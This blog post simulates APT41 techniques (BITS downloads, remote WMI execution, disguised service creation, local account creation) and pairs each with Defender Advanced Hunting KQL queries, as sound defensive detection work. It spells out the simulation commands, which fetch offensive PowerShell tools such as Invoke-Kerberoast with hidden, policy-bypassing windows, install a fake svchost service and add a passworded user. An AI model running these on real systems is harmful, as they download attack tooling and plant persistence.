In this post we cover a few techniques used by APT41, simulate each of them on a test machine, and then use the Advanced Hunting feature of Microsoft Defender ATP (KQL queries over the endpoint telemetry) to hunt for them.
APT41 is a group that carries out Chinese state-sponsored espionage activity in addition to financially motivated activity.
The group has been active since 2014 and has conducted operations backed by the Chinese government, including targeting of the health-care and high-tech sectors and espionage against political dissidents.
Adversaries may abuse Background Intelligent Transfer Service (BITS) jobs to download payloads, to persistently execute them or to clean up after them (MITRE ATT&CK T1197). The transfer itself is carried out by the BITS service inside a svchost.exe process, survives reboots and follows the host's proxy settings, which is why it blends in with Windows Update traffic.
FireEye has covered this well in their blog post, which makes it easy to simulate.
There we can see that APT41 used the bitsadmin.exe command-line tool to download malicious software.
To simulate the same technique, we can run the following command (the job name "bbbb" is arbitrary, and the destination directory C:\Temp has to exist, because bitsadmin does not create it):
bitsadmin /transfer bbbb https://raw.githubusercontent.com/HarmJ0y/ASREPRoast/master/ASREPRoast.ps1 C:\Temp\ASREPRoast.ps1
With the technique simulated, we can write a KQL query to hunt for it.
BITS jobs can be created and managed either through the BITSAdmin tool or through the BITS PowerShell cmdlets.
Since an adversary can just as well take the PowerShell route, the hunt should cover that variation too. Here is the same download done with Start-BitsTransfer:
powershell -windowstyle hidden -ExecutionPolicy ByPass -NoProfile Start-BitsTransfer -Source https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1 -Destination C:\Temp\Invoke-Kerberoast.ps1
After running the above, we can write a second KQL query that covers the PowerShell variant.
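Both simulations can be caught with one hunt. The queries below are an added example written for this post, not the original post's queries; they assume the current Advanced Hunting table names (DeviceProcessEvents, DeviceFileEvents; older tenants used ProcessCreationEvents and FileCreationEvents), and the only values taken from the simulation are the command-line switches, the cmdlet names and the raw.githubusercontent.com URLs.

```kql
// Added example, not the post's own query.
// Query 1: BITS downloads started from the command line, via bitsadmin.exe or the
// BITS PowerShell cmdlets. The BITS API (used by Windows Update, SCCM) never goes
// through these binaries, so command-line use is itself a signal.
DeviceProcessEvents
| where Timestamp > ago(7d)
| where (FileName =~ "bitsadmin.exe"
         and ProcessCommandLine has_any ("/transfer", "/create", "/addfile", "/resume", "/setnotifycmdline"))
     or (FileName in~ ("powershell.exe", "pwsh.exe")
         and ProcessCommandLine has_any ("Start-BitsTransfer", "Add-BitsFile", "Resume-BitsTransfer"))
// Remote source of the job (the simulation pulls from raw.githubusercontent.com)
| extend Url = extract(@"(https?://[^\s'"")]+)", 1, ProcessCommandLine)
// /setnotifycmdline is the persistence variant: BITS runs a program when the job completes
| extend Persistence = ProcessCommandLine has "/setnotifycmdline"
// The hidden-window / policy-bypass switches from the PowerShell simulation
| extend Hidden = ProcessCommandLine has_any ("-windowstyle hidden", "-w hidden", "-ExecutionPolicy ByPass", "-ep bypass")
| project Timestamp, DeviceName, AccountName, FileName, ProcessCommandLine, Url, Persistence, Hidden,
          InitiatingProcessFileName, InitiatingProcessCommandLine
| order by Timestamp desc

// Query 2 (run separately): the file side. The payload is written by the BITS service
// (svchost.exe), not by bitsadmin or PowerShell. BITS downloads into a BIT<hex>.tmp file
// in the destination folder and renames it to the final name on completion, so a
// BIT*.tmp created by svchost.exe in an unusual folder (C:\Temp in the simulation)
// is the transfer itself, regardless of which tool queued it.
DeviceFileEvents
| where Timestamp > ago(7d)
| where ActionType == "FileCreated"
| where InitiatingProcessFileName =~ "svchost.exe"
| where FileName startswith "BIT" and FileName endswith ".tmp"
| where not(FolderPath startswith @"C:\Windows\SoftwareDistribution")   // Windows Update's own BITS traffic
| project Timestamp, DeviceName, FolderPath, FileName, InitiatingProcessCommandLine
| order by Timestamp desc
```

Query 1 answers "who queued a download and from where"; query 2 confirms that the transfer actually ran and where the file landed, which matters when the command line was obfuscated or the job was created through the API rather than a binary. The SoftwareDistribution exclusion is the one place Windows itself downloads through BITS; add your own software-deployment paths to it.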
Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution (MITRE ATT&CK T1047). WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components; a process created remotely through the Win32_Process class runs on the target without any tool having to be dropped there first.
According to FireEye, APT41 likes to use WMI to execute commands on remote machines. To simulate this we use the open-source WmiExec.ps1 script. It is a script with parameters rather than a function, so it is saved to disk and invoked instead of being piped into IEX; replace RemoteMachine with a host on which the current account is a local administrator:
powershell.exe -exec bypass -C "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/OneScripter/WmiExec/master/WmiExec.ps1', 'C:\Temp\WmiExec.ps1'); C:\Temp\WmiExec.ps1 -ComputerName RemoteMachine -Command 'whoami'"
After running that, we can write a KQL query to hunt for remote WMI command execution.
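The hunt has two sides: the machine that received the command and the machine it was sent from. The queries below are an added example written for this post, not the original post's queries; they assume the current DeviceProcessEvents schema, and the list of child process names and the "three devices or fewer" rarity threshold are my choices, not values from the post.

```kql
// Added example, not the post's own query.
// Query 1, target side: a command run through Win32_Process.Create is spawned by the WMI
// provider host, WmiPrvSE.exe. That parent relationship holds for WmiExec.ps1,
// wmic /node:..., Invoke-WmiMethod and Impacket's wmiexec alike, so it is the
// tool-independent signal. Management agents also create processes this way, but they
// do so with the same command line on many devices; an operator does not.
DeviceProcessEvents
| where Timestamp > ago(7d)
| where InitiatingProcessFileName =~ "wmiprvse.exe"
| where FileName in~ ("cmd.exe", "powershell.exe", "pwsh.exe", "whoami.exe",
                      "rundll32.exe", "regsvr32.exe", "mshta.exe", "wscript.exe", "cscript.exe")
| summarize Executions = count(),
            Devices = dcount(DeviceName),
            FirstSeen = min(Timestamp), LastSeen = max(Timestamp),
            SampleDevices = make_set(DeviceName, 5),
            SampleCommands = make_set(ProcessCommandLine, 5)
          by AccountName, FileName
| where Devices <= 3            // rare (account, child) pairs first; raise for large estates
| order by Executions asc

// Query 2 (run separately), source side: the operator's own host shows PowerShell or
// wmic addressing a remote computer with the Win32_Process class or the WmiExec script.
// In the simulation the whole script invocation, including -ComputerName, is part of
// the powershell.exe command line.
DeviceProcessEvents
| where Timestamp > ago(7d)
| where (FileName in~ ("powershell.exe", "pwsh.exe")
         and ProcessCommandLine has_any ("Win32_Process", "Invoke-WmiMethod", "Invoke-CimMethod", "WmiExec")
         and ProcessCommandLine has_any ("-ComputerName", "-CimSession"))
     or (FileName =~ "wmic.exe" and ProcessCommandLine has "/node:")
| extend Target = extract(@"(?i)(?:-ComputerName\s+|/node:)""?([^\s""]+)", 1, ProcessCommandLine)
| project Timestamp, DeviceName, AccountName, Target, ProcessCommandLine,
          InitiatingProcessFileName, InitiatingProcessCommandLine
| order by Timestamp desc
```

Pivot between the two: a Target in query 2 should show up as a DeviceName with a WmiPrvSE.exe child in query 1 at the same time, which also tells you the lateral movement succeeded. Query 1 needs tuning per environment; the exclusion to add is not a process name but a full command line you have verified belongs to an agent.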
Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence (MITRE ATT&CK T1543.003). When Windows boots, it starts programs called services that perform background system functions, and a service set to start automatically runs with SYSTEM privileges without any user logging on.
To extend what Advanced Hunting can see, we enable the following audit policy from an elevated prompt so that Windows logs Security event 4697 (a service was installed) whenever a new service is installed:
auditpol /set /subcategory:"Security System Extension" /success:enable
Now let's take a look at the FireEye report. APT41 created a new service on the compromised machine for persistence, pointing it at svchost.exe with its own service group so that it looked like a normal Windows-hosted service.
Let's do the same and create a new service. Run this from an elevated prompt; the space after each "=" is required by sc. Because no ServiceDll or svchost group is registered for it, the service will not actually start, but the installation is what we want logged:
sc create "StorSyncSvc" binPath= "%SystemRoot%\system32\svchost.exe -k StorSyncSvc" type= share start= auto error= ignore DisplayName= "StorSyncSvc"
To find out who created a new service on which machine, we can use the following KQL query:
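Two data sources answer that question, and they answer different halves of it. The queries below are an added example written for this post, not the original post's queries. They assume the current DeviceEvents and DeviceRegistryEvents schema, that the ServiceInstalled action type is the one Defender derives from event 4697, and that the AdditionalFields of that event carry ServiceName, ServiceStartType, ServiceType and ServiceAccount (field names as I have seen them; confirm against your own data). "StorSyncSvc" is the only value taken from the simulation.

```kql
// Added example, not the post's own query.
// Query 1: who installed what. ActionType "ServiceInstalled" is built from Security
// event 4697, so it only exists once the audit policy above is enabled. The subject
// of that event (the installing account) is the answer to "who".
DeviceEvents
| where Timestamp > ago(7d)
| where ActionType == "ServiceInstalled"
| extend Fields = parse_json(AdditionalFields)
| extend ServiceName      = tostring(Fields.ServiceName),        // assumed field names, see lead-in
         ServiceStartType = tostring(Fields.ServiceStartType),
         ServiceType      = tostring(Fields.ServiceType),
         ServiceAccount   = tostring(Fields.ServiceAccount)
| project Timestamp, DeviceName, InstalledBy = AccountName, ServiceName, ServiceStartType, ServiceType,
          ServiceAccount, FileName, FolderPath, InitiatingProcessFileName, InitiatingProcessCommandLine
| order by Timestamp desc

// Query 2 (run separately): what the service actually points at. Every install, by any
// tool (sc.exe, New-Service, PsExec, a direct CreateService call), ends as a write of
// ImagePath, and for svchost-hosted services ServiceDll, under
// HKLM\SYSTEM\CurrentControlSet\Services\<name>. Caveat: the Service Control Manager
// (services.exe) performs that write on the caller's behalf, so the initiating process
// here is services.exe and does not identify the creator; query 1 does that.
DeviceRegistryEvents
| where Timestamp > ago(7d)
| where ActionType == "RegistryValueSet"
| where RegistryKey startswith @"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\"
| where RegistryValueName in~ ("ImagePath", "ServiceDll")
// key layout: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\<name>[\Parameters]
| extend ServiceName = tostring(split(RegistryKey, @"\")[4])
// The simulation's ImagePath is svchost.exe with a custom -k group. svchost only hosts
// groups listed under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost;
// a group name you do not recognise (StorSyncSvc) is the tell.
| extend SvchostGroup = extract(@"(?i)svchost\.exe\s+-k\s+""?([^\s""]+)", 1, RegistryValueData)
| extend ImageOutsideWindows = RegistryValueName =~ "ImagePath"
                               and not(RegistryValueData has_any (@"\Windows\system32\", @"\Windows\SysWOW64\", @"\Program Files"))
| project Timestamp, DeviceName, ServiceName, RegistryValueName, RegistryValueData, SvchostGroup, ImageOutsideWindows,
          InitiatingProcessFileName, InitiatingProcessAccountName
| order by Timestamp desc
```

Join the two on DeviceName and ServiceName when you need both halves in one row. The sc.exe command line from the simulation is also visible in DeviceProcessEvents (FileName sc.exe, command line containing "create"), but that only covers that one tool, which is why the queries above key on the event and the registry write instead.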
Adversaries may create an account to maintain access to victim systems (MITRE ATT&CK T1136.001 for a local account). The simulation below creates a local user with net.exe and needs an elevated prompt:
net user localaccount Passw0rd! /add
Here is a KQL query to look for local account creations.
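The command-line view catches the simulation; the account-management event catches every other way of creating an account. The queries below are an added example written for this post, not the original post's queries. They assume the current DeviceProcessEvents and DeviceEvents schema and that, for the UserAccountCreated action type, AccountName is the account that was created and InitiatingProcessAccountName the account that created it (an assumption to confirm on your tenant). "localaccount" and "/add" are the only values taken from the simulation.

```kql
// Added example, not the post's own query.
// Query 1: net user <name> <password> /add. net.exe hands "user" commands to net1.exe,
// so one creation produces two process events (net.exe, then net1.exe as its child);
// both are kept here and InitiatingProcessParentFileName on the net1.exe row shows
// what launched net.exe in the first place (cmd.exe, powershell.exe, a service binary).
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName in~ ("net.exe", "net1.exe")
| where ProcessCommandLine has "user" and ProcessCommandLine has "/add"
// the token after "user" is the new account name
| extend NewAccount = extract(@"(?i)\buser\s+""?([^\s""/]+)", 1, ProcessCommandLine)
| extend Scope = iff(ProcessCommandLine has "/domain", "domain", "local")
| project Timestamp, DeviceName, CreatedBy = AccountName, NewAccount, Scope, FileName, ProcessCommandLine,
          InitiatingProcessFileName, InitiatingProcessParentFileName
| order by Timestamp desc

// Query 2 (run separately): the account-management event (Security 4720), which fires
// whether the account was created with net user, New-LocalUser, the Computer Management
// console or a direct NetUserAdd call. This is the one to alert on; query 1 is for
// attribution detail once it fires.
DeviceEvents
| where Timestamp > ago(7d)
| where ActionType == "UserAccountCreated"
| project Timestamp, DeviceName,
          NewAccount = AccountName,                      // assumed column semantics, see lead-in
          CreatedBy  = InitiatingProcessAccountName,
          InitiatingProcessFileName, InitiatingProcessCommandLine, AdditionalFields
| order by Timestamp desc
```

A created account that never appears in query 2 for the same device and time means the process event came from a failed attempt (for example a password rejected by policy), which is worth knowing before escalating.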
I've provided a few KQL queries, but feel free to fine-tune them for your environment. These are only a few examples of techniques used by this threat actor and by no means cover all of them.